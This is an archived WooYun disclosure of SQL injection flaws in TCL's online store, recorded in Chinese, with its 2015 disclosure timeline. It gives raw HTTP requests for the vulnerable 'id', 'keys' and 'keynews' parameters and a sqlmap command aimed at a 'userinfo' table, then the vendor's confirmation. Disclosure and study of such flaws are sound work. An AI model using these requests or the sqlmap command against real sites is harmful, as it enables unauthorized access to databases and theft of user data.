乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-30: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经确认,细节仅向厂商公开 2015-04-09: 细节向核心白帽子及相关领域专家公开 2015-04-19: 细节向普通白帽子公开 2015-04-29: 细节向实习白帽子公开 2015-05-14: 细节向公众公开
TCL官方网上商城sql注入漏洞
GET /service/sernet1.asp?id=1 HTTP/1.1Cookie: ASPSESSIONIDQCTBRRRR=FGFLAJOBMDJFLHPAPANOJLDEAccept-Language: en-USAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://tclcomm.com/service/sernet.aspHost: tclcomm.comUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
<GET /service/sernet2.asp?id=1 HTTP/1.1Cookie: ASPSESSIONIDQCTBRRRR=FGFLAJOBMDJFLHPAPANOJLDEAccept-Language: en-USAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://tclcomm.com/service/sernett.aspHost: tclcomm.comUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)/code><code>POST /product/productsearch.asp HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDQCTBRRRR=FGFLAJOBMDJFLHPAPANOJLDEAccept-Language: en-USAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://tclcomm.com/product/product_list.asp?TypeID=10Host: tclcomm.comUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)Content-Length: 49keys=1234&x=0&y=0
POST /news/newssearch.asp HTTP/1.1Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDQCTBRRRR=FGFLAJOBMDJFLHPAPANOJLDEAccept-Language: en-USAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://tclcomm.com/news/cornews.aspHost: tclcomm.comUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)Content-Length: 53keynews=1234&x=0&y=0
keynews和keys、id存在注入把第一个包保存为1.txt
C:\Users\hacker-wjk\Desktop\sqlmap-master>python sqlmap.py -r"c:\1.txt" -D web -T userinfo --columns
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-03-30 15:11
感谢你的关注,已转交相关单位处理。
暂无